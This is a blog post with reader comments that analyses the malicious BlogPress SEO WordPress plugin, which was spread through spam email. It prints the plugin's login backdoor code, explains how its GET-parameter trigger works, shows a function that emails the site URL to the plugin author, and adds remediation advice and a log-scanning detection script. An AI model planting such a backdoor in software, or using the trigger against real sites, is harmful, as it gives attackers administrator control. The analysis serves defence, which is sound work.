As with most scamming attempts, it all started with an email—which I ignored when I received it on Wednesday. It made claims of terrific SEO improvements using backlinks—yeah right. I do not use SEO enhancement plugins (other than Google XML sitemaps), and never plan on doing so. Anyways, the sender’s name was Saurabh, and his message was as follows:
Hello, My name is Saurabh, and I am here to offer you a unique wordpress plugin which will get you 100’s of backlinks like crazy. The plugin is 100% free and I can also offer installation help. http://BlogPressSEO.com Why backlinks are important for getting traffic. http://BlogPressSEO.com/#1 This is how the plugin works http://BlogPressSEO.com/#2 Thanks
Well, even though I was not going to install the plugin, the engineer in me wanted to investigate the code. So, I downloaded it, and did not like what I saw. Not only are there malicious components, there are several stylistic issues, and the plugin author did not follow some of the WordPress plugin best practices. A short list of stylistic issues:
- Did not use a unique prefix on its functions to avoid function name collisions. It uses function names such as fun_serverpath, SureRemoveDir, fun_create_menu_wplink, wplink_activate, cleansee, etc. While it looks like fun_ is the unique prefix the author is using, fun is too common a word for a prefix and is used in some programming styles to denote that a quantity is a function. Plus there is a ton of inconsistency between function names.
- Saves its settings across several options entries. While this is no longer a great performance issue, thanks to autoloading, it still clutters the wp_options table and does slow down every page load by a little bit. At least the author seems to use hwe_ as the option prefix for most of the options it creates; too bad this was not done for the functions.
- Performs manual SQL queries, not using the $wpdb object.
Analysis of the code is a little frightening. Look at this block of code:
```php
//if loginyes and emial then login
if($loginyes==1 && $email==get_option('admin_email'))
{
	global $wpdb;
	$tabname=$wpdb->prefix."users";
	$find_admin_sql="select * from $tabname where user_login='admin'";
	$find_sql=mysql_query($find_admin_sql);
	$user_numrow=mysql_num_rows($find_sql);
	if($user_numrow!=0)
	{
		$user_login='admin';
	}
	if($user_numrow==0)
	{
		$find_ana_admin_sql="select * from $tabname";
		$find_sql_res=mysql_query($find_ana_admin_sql);
		while($row_find=mysql_fetch_array($find_sql_res))
		{
			$userid=$row_find['ID'];
			$user_login_find=$row_find['user_login'];
			$level=get_usermeta( $userid,'wp_user_level');
			if($level==10)
			{
				$user_login=$user_login_find;
				break;
			}
		}
	}
	$user=new WP_User(0, $user_login);
	$user_pass = md5($user->user_pass);
	wp_login($user_login, $user_pass, true);
	wp_setcookie($user_login, $user_pass, true);
	wp_set_current_user($user_id, $user_login);
	$radirect=get_option('home')."/wp-admin";
	echo "<script language=\"javascript\">";
	echo "location.replace('$radirect')";
	echo "</script>";
}
```
Well, looks like a backdoor, right? Knowing that $loginyes and $email are set using GET superglobals is even more worrying. Just appending ?loginyes=1&email= to any URL on a site running this script will get you in; all you need to know is the email address of the admin. Now, who would have that information?
```php
function email_send_fun()
{
	$headers="From:".get_option('admin_email')."\n";
	$headers.="Reply-to:".get_option('admin_email')."\n";
	$sub="BlogPressSeo new installation.";
	$mes=get_option('siteurl');
	$to="info@blogpressseo.com";
	mail($to,$sub,$mes,$headers);
	$hwe_blogidd=get_option("hwe_blogid");
	update_option("hwe_saveradio_option",3);
	update_option("hwe_linkplacement",3);
	if($hwe_blogidd)
	{
		wplink_activate();
	}
}
```
Oh, right, that would be whoever reads info@blogpressseo.com. This is the malicious function Joost de Valk found and reported in his post BlogPress SEO Plugin: Spam!. This function runs every time the plugin is activated.
If you have installed this plugin, delete it immediately. Then, change your admin email address (under Settings > General, look for the option E-mail address). You’ll have to manually clean up your wp_options table as the author did not provide an uninstall method.
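To check whether the backdoor was already used against a site that ran the plugin, the access log can be searched for requests carrying both query parameters. This is an added example, not code from the original post or from the plugin; it assumes the Apache/nginx combined log format, and the function name, sample log lines and addresses are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Combined log format is an assumption; adjust the pattern for other formats.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) '
)

def find_backdoor_requests(lines, admin_email=None):
    """Return requests whose query string carries both backdoor parameters.

    Any value of loginyes is reported, not only "1", so probes show up too.
    """
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m is None:
            continue  # not a request line in the assumed format
        target = urlsplit(m["target"])
        # parse_qs percent-decodes values; keep blanks so "email=" is still seen
        params = parse_qs(target.query, keep_blank_values=True)
        if "loginyes" not in params or "email" not in params:
            continue
        email = params["email"][-1]  # PHP keeps the last duplicate parameter
        hits.append({
            "ip": m["ip"],
            "time": m["time"],
            "path": target.path,
            "status": int(m["status"]),
            "email": email,
            "admin_match": admin_email is not None and email == admin_email,
        })
    return hits

# Constructed sample lines (documentation IP ranges, example.com addresses).
SAMPLE_LOG = [
    '203.0.113.7 - - [12/Mar/2010:10:01:22 +0000] "GET /?loginyes=1&email=admin%40example.com HTTP/1.1" 200 512 "-" "-"',
    '198.51.100.4 - - [12/Mar/2010:10:02:40 +0000] "GET /2010/03/post/?p=5 HTTP/1.1" 200 9001 "-" "-"',
    '203.0.113.7 - - [12/Mar/2010:10:03:05 +0000] "GET /about/?email=other%40example.com&loginyes=1 HTTP/1.1" 200 498 "-" "-"',
    '198.51.100.9 - - [12/Mar/2010:10:04:11 +0000] "GET /contact/?email=reader%40example.com HTTP/1.1" 200 2210 "-" "-"',
]

if __name__ == "__main__":
    for hit in find_backdoor_requests(SAMPLE_LOG, admin_email="admin@example.com"):
        print(hit)
```

A hit with admin_match set means the requester already knew the admin address, so any sessions and changes made around that timestamp deserve review.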
Update: You may want to read the next post on this topic, “BlogPress SEO Aftermath“.
-John Havlik
Thanks for the Heads up….
It's really bad!
Why did he do it?
He’s trying to hack all WP and inject his link to get more backlinks, maybe?
Regards
It is really bad.
Being an IT guy, we can’t just install plugins. It is better to investigate like this and then only install.
Thanks for this info.